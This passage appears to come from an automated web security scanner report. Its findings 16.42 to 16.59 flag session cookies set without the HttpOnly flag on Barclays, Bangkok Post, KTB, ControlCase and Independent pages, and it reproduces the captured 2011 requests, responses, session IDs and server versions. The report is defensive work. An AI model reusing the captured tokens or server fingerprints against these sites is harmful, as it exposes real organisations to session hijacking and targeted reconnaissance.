GET /business/company-in-thailand/financial/banking/search/x26amp HTTP/1.1
Host: www.bangkokpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 13:38:04 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: __se=YTo2OntzOjk6IlNFU1NJT05JRCI7czoyNjoiZXIzOXNwNnYyMWNwZTN1a3FmOTBlcGVhaDciO3M6MTQ6IkNPT0tJRV9TRVNTSU9OIjtzOjQ6Il9fc2UiO3M6MjA6IlNUQVRVU19TVEFSVF9TRVNTSU9OIjtzOjc6IlNVQ0NFU1MiO3M6MDoiIjtOO3M6OToiY29va2llX2lwIjtzOjE1OiIxNzMuMTkzLjIxNC4yNDMiO3M6NjoiU1RBVFVTIjtzOjc6InN1Y2Nlc3MiO30%3D; path=/; domain=.bangkokpost.com; httponly
Set-Cookie: PHPSESSID=m7p0jcnu52i8b59ffdpsdscrf7; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 21310

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<title>Bangkokpost : B
...[SNIP]...

16.42. http://www.bangkokpost.com/business/company-in-thailand/financial/search/x26amp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.bangkokpost.com
Path:   /business/company-in-thailand/financial/search/x26amp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /business/company-in-thailand/financial/search/x26amp HTTP/1.1
Host: www.bangkokpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 13:38:02 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: __se=YTo2OntzOjk6IlNFU1NJT05JRCI7czoyNjoiNDFlYTd0aDc4OTMwNzNxbHFoNzYwcXA5cDUiO3M6MTQ6IkNPT0tJRV9TRVNTSU9OIjtzOjQ6Il9fc2UiO3M6MjA6IlNUQVRVU19TVEFSVF9TRVNTSU9OIjtzOjc6IlNVQ0NFU1MiO3M6MDoiIjtOO3M6OToiY29va2llX2lwIjtzOjE1OiIxNzMuMTkzLjIxNC4yNDMiO3M6NjoiU1RBVFVTIjtzOjc6InN1Y2Nlc3MiO30%3D; path=/; domain=.bangkokpost.com; httponly
Set-Cookie: PHPSESSID=sp10k0fkgufd7cerlthgse6p52; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 21169

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<title>Bangkokpost : B
...[SNIP]...

16.43. https://www.barclays-home-insurance.co.uk/p4/Barclays/Home/Assumptions.aspx  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://www.barclays-home-insurance.co.uk
Path:   /p4/Barclays/Home/Assumptions.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /p4/Barclays/Home/Assumptions.aspx HTTP/1.1
Host: www.barclays-home-insurance.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
p3p: CP="NON CUR OTPi OUR NOR UNI"
content-type: text/html; charset=utf-8
date: Tue, 03 May 2011 12:53:24 GMT
cache-control: private
x-powered-by: ASP.NET
x-aspnet-version: 2.0.50727
server: Microsoft-IIS/7.0
connection: close
x-old-content-length: 51727
Set-Cookie: ASP.NET_SessionId=mgn2cmy0yflvep55gnwr1g45; Path=/p4/; Secure


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" dir="ltr" lang=
...[SNIP]...

16.44. https://www.barclays-home-insurance.co.uk/p4/barclays/SaveRetrieve/Saveandretrieveloginpage.aspx  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://www.barclays-home-insurance.co.uk
Path:   /p4/barclays/SaveRetrieve/Saveandretrieveloginpage.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /p4/barclays/SaveRetrieve/Saveandretrieveloginpage.aspx HTTP/1.1
Host: www.barclays-home-insurance.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
p3p: CP="NON CUR OTPi OUR NOR UNI"
content-type: text/html; charset=utf-8
date: Tue, 03 May 2011 12:53:25 GMT
cache-control: no-cache
x-powered-by: ASP.NET
x-aspnet-version: 2.0.50727
server: Microsoft-IIS/7.0
connection: close
x-old-content-length: 32090
expires: -1
pragma: no-cache
Set-Cookie: ASP.NET_SessionId=mrfz3p453npu1nakrm120w55; Path=/p4/; Secure


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" dir="ltr" lang=
...[SNIP]...

16.45. http://www.barclays.co.uk/Currentaccounts/P1242557963414  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.barclays.co.uk
Path:   /Currentaccounts/P1242557963414

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Currentaccounts/P1242557963414 HTTP/1.1
Host: www.barclays.co.uk
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mbox=check#true#1304436224|session#1304436163124-351101#1304438024; SS_X_JSESSIONID=00004_zLOQV_87a8PfwOVHjEuuh%3A149iif9ed; WT_FPC=id=2e6a8286f3ae7c7522a1304421997884:lv=1304454253315:ss=1304454071727

Response

HTTP/1.1 200 OK
Server: GREEN
Date: Tue, 03 May 2011 10:24:16 GMT
Content-language: en-GB
Last-modified: Tue, 03 May 2011 10:24:16 GMT
Content-type: text/html;charset=UTF-8
Set-cookie: JSESSIONID=6CD2B94662A5F8FD5A74FB91C73B9CBC; Path=/cs; Secure
Set-cookie: SS_X_JSESSIONID=00004_zLOQV_87a8PfwOVHjEuuh%3A149iif9ed; Path=/
Content-Length: 52821

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Current Accounts | Barclays Curr
...[SNIP]...

16.46. http://www.barclays.co.uk/Insurance/Homeinsurance/BuildingsandContentsInsurance/P1242557976121  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.barclays.co.uk
Path:   /Insurance/Homeinsurance/BuildingsandContentsInsurance/P1242557976121

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Insurance/Homeinsurance/BuildingsandContentsInsurance/P1242557976121 HTTP/1.1
Host: www.barclays.co.uk
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mbox=check#true#1304436224|session#1304436163124-351101#1304438024; WT_FPC=id=2e6a8286f3ae7c7522a1304421997884:lv=1304454260040:ss=1304454071727; SS_X_JSESSIONID=00004_zLOQV_87a8PfwOVHjEuuh%3A149iif9ed

Response

HTTP/1.1 200 OK
Server: GREEN
Date: Tue, 03 May 2011 10:24:24 GMT
Set-cookie: SS_X_JSESSIONID=00004_zLOQV_87a8PfwOVHjEuuh%3A149iif9ed; Path=/
Cache-control: no-cache="set-cookie, set-cookie2"
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Content-language: en-GB
Last-modified: Tue, 03 May 2011 10:24:25 GMT
Content-type: text/html;charset=UTF-8
Set-cookie: JSESSIONID=B9CFBC30D5E28F3802F81CBC98DF3F2C; Path=/cs; Secure
Content-Length: 57967

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Home Insurance | House Insurance
...[SNIP]...

16.47. http://www.barclays.co.uk/Insurance/P1242557963438  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.barclays.co.uk
Path:   /Insurance/P1242557963438

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Insurance/P1242557963438 HTTP/1.1
Host: www.barclays.co.uk
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mbox=check#true#1304436224|session#1304436163124-351101#1304438024; SS_X_JSESSIONID=00004_zLOQV_87a8PfwOVHjEuuh%3A149iif9ed; WT_FPC=id=2e6a8286f3ae7c7522a1304421997884:lv=1304454260040:ss=1304454071727

Response

HTTP/1.1 200 OK
Server: BLUE
Date: Tue, 03 May 2011 10:24:22 GMT
Set-cookie: SS_X_JSESSIONID=00004_zLOQV_87a8PfwOVHjEuuh%3A149iif9ed; Path=/
Cache-control: no-cache="set-cookie, set-cookie2"
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Content-language: en-GB
Last-modified: Tue, 03 May 2011 10:24:22 GMT
Content-type: text/html;charset=UTF-8
Set-cookie: JSESSIONID=41A556F7B660E26259C49586495179E9; Path=/cs; Secure
Content-Length: 48844

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Insurance - Barclays</title>
<me
...[SNIP]...

16.48. http://www.barclays.co.uk/Loans/P1242557963420  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.barclays.co.uk
Path:   /Loans/P1242557963420

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Loans/P1242557963420 HTTP/1.1
Host: www.barclays.co.uk
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mbox=check#true#1304436224|session#1304436163124-351101#1304438024; WT_FPC=id=2e6a8286f3ae7c7522a1304421997884:lv=1304454253315:ss=1304454071727; SS_X_JSESSIONID=00004_zLOQV_87a8PfwOVHjEuuh%3A149iif9ed

Response

HTTP/1.1 200 OK
Server: RED
Date: Tue, 03 May 2011 10:24:18 GMT
Set-cookie: SS_X_JSESSIONID=00004_zLOQV_87a8PfwOVHjEuuh%3A149iif9ed; Path=/
Cache-control: no-cache="set-cookie, set-cookie2"
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Content-language: en-GB
Last-modified: Tue, 03 May 2011 10:24:18 GMT
Content-type: text/html;charset=UTF-8
Set-cookie: JSESSIONID=A63FCB7E3AE0AC6FDEC1A7B03EA2496B; Path=/cs; Secure
Content-Length: 45467

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Loans Online from Barclays - Bar
...[SNIP]...

16.49. http://www.barclays.co.uk/Mortgages/P1242557963476  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.barclays.co.uk
Path:   /Mortgages/P1242557963476

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Mortgages/P1242557963476 HTTP/1.1
Host: www.barclays.co.uk
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SS_X_JSESSIONID=00004_zLOQV_87a8PfwOVHjEuuh%3A149iif9ed; WT_FPC=id=2e6a8286f3ae7c7522a1304421997884:lv=1304454264566:ss=1304454071727; mbox=session#1304436163124-351101#1304438125|check#true#1304436325

Response

HTTP/1.1 200 OK
Server: BLUE
Date: Tue, 03 May 2011 10:24:28 GMT
Set-cookie: SS_X_JSESSIONID=00004_zLOQV_87a8PfwOVHjEuuh%3A149iif9ed; Path=/
Cache-control: no-cache="set-cookie, set-cookie2"
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Content-language: en-GB
Last-modified: Tue, 03 May 2011 10:24:28 GMT
Content-type: text/html;charset=UTF-8
Set-cookie: JSESSIONID=055A1E5F1E3B9898D7DC08C549AE30E5; Path=/cs; Secure
Content-Length: 61913

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Mortgages | Barclays Best Mortga
...[SNIP]...

16.50. http://www.barclays.co.uk/PersonalBanking/P1242557947640  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.barclays.co.uk
Path:   /PersonalBanking/P1242557947640

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /PersonalBanking/P1242557947640 HTTP/1.1
Host: www.barclays.co.uk
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WT_FPC=id=2e6a8286f3ae7c7522a1304421997884:lv=1304454124377:ss=1304454071727

Response

HTTP/1.1 200 OK
Server: BLUE
Date: Tue, 03 May 2011 10:22:36 GMT
Cache-control: no-cache="set-cookie, set-cookie2"
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Content-language: en-GB
Last-modified: Tue, 03 May 2011 10:22:36 GMT
Content-type: text/html;charset=UTF-8
Set-cookie: JSESSIONID=15D5895F848FDF46843C2921B35E7B89; Path=/cs; Secure
Content-Length: 63375

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Barclays Personal Banking | ISAs
...[SNIP]...

16.51. http://www.barclays.co.uk/Savings/ISAs/H1242557860616  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.barclays.co.uk
Path:   /Savings/ISAs/H1242557860616

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Savings/ISAs/H1242557860616?selectedGroupName=ISAs HTTP/1.1
Host: www.barclays.co.uk
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mbox=check#true#1304436224|session#1304436163124-351101#1304438024; WT_FPC=id=2e6a8286f3ae7c7522a1304421997884:lv=1304454253315:ss=1304454071727; SS_X_JSESSIONID=00004_zLOQV_87a8PfwOVHjEuuh%3A149iif9ed

Response

HTTP/1.1 200 OK
Server: BLUE
Date: Tue, 03 May 2011 10:24:21 GMT
Content-language: en-GB
Last-modified: Tue, 03 May 2011 10:24:21 GMT
Content-type: text/html;charset=UTF-8
Set-cookie: JSESSIONID=8C53C5C0D340CC662989C40DAC749BDA; Path=/cs; Secure
Set-cookie: SS_X_JSESSIONID=00004_zLOQV_87a8PfwOVHjEuuh%3A149iif9ed; Path=/
Content-Length: 56427

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Barclays Savings | Our Best Savi
...[SNIP]...

16.52. http://www.barclays.co.uk/cs/Satellite  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.barclays.co.uk
Path:   /cs/Satellite

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /cs/Satellite?pagename=Barclays/CSElement/BOHubChooser&renderMode=js HTTP/1.1
Host: www.barclays.co.uk
Proxy-Connection: keep-alive
Referer: http://www.barclays.co.uk/PersonalBanking/P1242557947640
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WT_FPC=id=2e6a8286f3ae7c7522a1304421997884:lv=1304454124377:ss=1304454071727; mbox=check#true#1304436224|session#1304436163124-351101#1304438024

Response

HTTP/1.1 200 OK
Server: BLUE
Date: Tue, 03 May 2011 10:22:47 GMT
Set-cookie: SS_X_JSESSIONID=0000X3wV8WsOSBwEHgGmEZX6lPZ%3A149iif9ed; Path=/
Content-language: en-GB
Cache-control: no-cache="set-cookie, set-cookie2"
Last-modified: Tue, 03 May 2011 10:03:36 GMT
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Content-type: text/html;charset=UTF-8
Set-cookie: JSESSIONID=EEC23FA025990E645492550984499DCD; Path=/cs; Secure
Set-cookie: SS_X_JSESSIONID=0000X3wV8WsOSBwEHgGmEZX6lPZ%3A149iif9ed; Path=/
Content-Length: 6106

<div class="tab-content" id="hometab2">
<div class="hub-chooser-content">
<h2 style="font-family: verdana;">Borrow from us</h2>
<p style="font-size: 1em; line-height: 17px; font-family: verdana;">If y
...[SNIP]...

16.53. https://www.bizpayment.ktb.co.th/epayview/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://www.bizpayment.ktb.co.th
Path:   /epayview/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /epayview/ HTTP/1.1
Host: www.bizpayment.ktb.co.th
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 12:53:32 GMT
Content-type: text/html;charset=utf-8
X-HP-CAM-COLOR: V=1;ServerAddr=sMVxqLQOS+/Q3oBiJs7EtA==;GUID=1|x02TzA7tbiYpm9br7GTUIA3-tyKGZdPujnJ-HNYIRFg.|L2VwYXl2aWV3L2luZGV4LmpzcA..
Set-Cookie: JSESSIONID=N16N74kl8KmPjvQjKWXLGtGgG2SbBbqGGhm3rQgrkGPLvbQYVzJQ!1246557006; path=/
Connection: close
Set-Cookie: BIGipServerwww.bizpayment.ktb.co.th_ext=2925265162.47873.0000; path=/


<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xht
...[SNIP]...

16.54. http://www.business.barclays.co.uk/BRC1/jsp/brccontrol  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.business.barclays.co.uk
Path:   /BRC1/jsp/brccontrol

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /BRC1/jsp/brccontrol HTTP/1.1
Host: www.business.barclays.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 13:38:20 GMT
Set-Cookie: sesessionid=0WR5SM3IDSMYCPUZZCV04ZY;Path=/
Cache-Control: no-cache="set-cookie,set-cookie2"
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Content-Type: text/html;charset=646
Content-Language: en
Content-type: text/html
Content-length: 2371
Connection: close

<!-- Vignette V/5 Tue May 03 14:38:21 2011 -->


                                                   <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">

<html>
<h
...[SNIP]...

16.55. http://www.controlcase.com/contact.php  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.controlcase.com
Path:   /contact.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /contact.php HTTP/1.1
Host: www.controlcase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _pk_ses.3.456c=*; __utmz=208121856.1303664485.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _pk_id.3.456c=a61059e51c4888a1.1304435948.1.1304435948.1304435948; __utma=208121856.1998732058.1303664485.1303664485.1304435950.2; __utmc=208121856; __utmb=208121856.1.10.1304435950;

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 13:39:18 GMT
Server: Apache/2.0.55 (Win32)
Set-Cookie: PHPSESSID=169df3ac91d28df3847d2356cf84cc64; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 22185

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...

16.56. http://www.controlcase.com/logon_page.php  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.controlcase.com
Path:   /logon_page.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /logon_page.php HTTP/1.1
Host: www.controlcase.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.controlcase.com/
Cookie: __utma=208121856.1545234492.1303665078.1303665078.1304448138.2; __utmz=208121856.1303665078.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _pk_id.3.456c=244604216c6eb329.1304448138.1.1304448138.1304448138; _pk_ses.3.456c=*; __utmb=208121856.1.10.1304448138; __utmc=208121856

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 13:48:35 GMT
Server: Apache/2.0.55 (Win32)
Set-Cookie: PHPSESSID=07e3bb6d4b76700960b5fb43a49962a7; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 20435

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...

16.57. http://www.independent.co.uk/news/world/asia/x26amp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.independent.co.uk
Path:   /news/world/asia/x26amp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /news/world/asia/x26amp HTTP/1.1
Host: www.independent.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Tue, 03 May 2011 13:33:30 GMT
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en
Set-Cookie: JSESSIONID=9A22AF1D575693F0AECFB775E75FBEC7; Path=/independentLondon
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Length: 73917

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:fb="http://www.f
...[SNIP]...

16.58. http://www.independent.co.uk/news/world/x26amp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.independent.co.uk
Path:   /news/world/x26amp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /news/world/x26amp HTTP/1.1
Host: www.independent.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Tue, 03 May 2011 13:33:33 GMT
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en
Set-Cookie: JSESSIONID=870E3BEDB5E937E1D6E7BC0ED11869A0; Path=/independentLondon
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Length: 73917

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:fb="http://www.f
...[SNIP]...

16.59. http://www.independent.co.uk/news/x26amp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.independent.co.uk
Path:   /news/x26amp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /news/x26amp HTTP/1.1
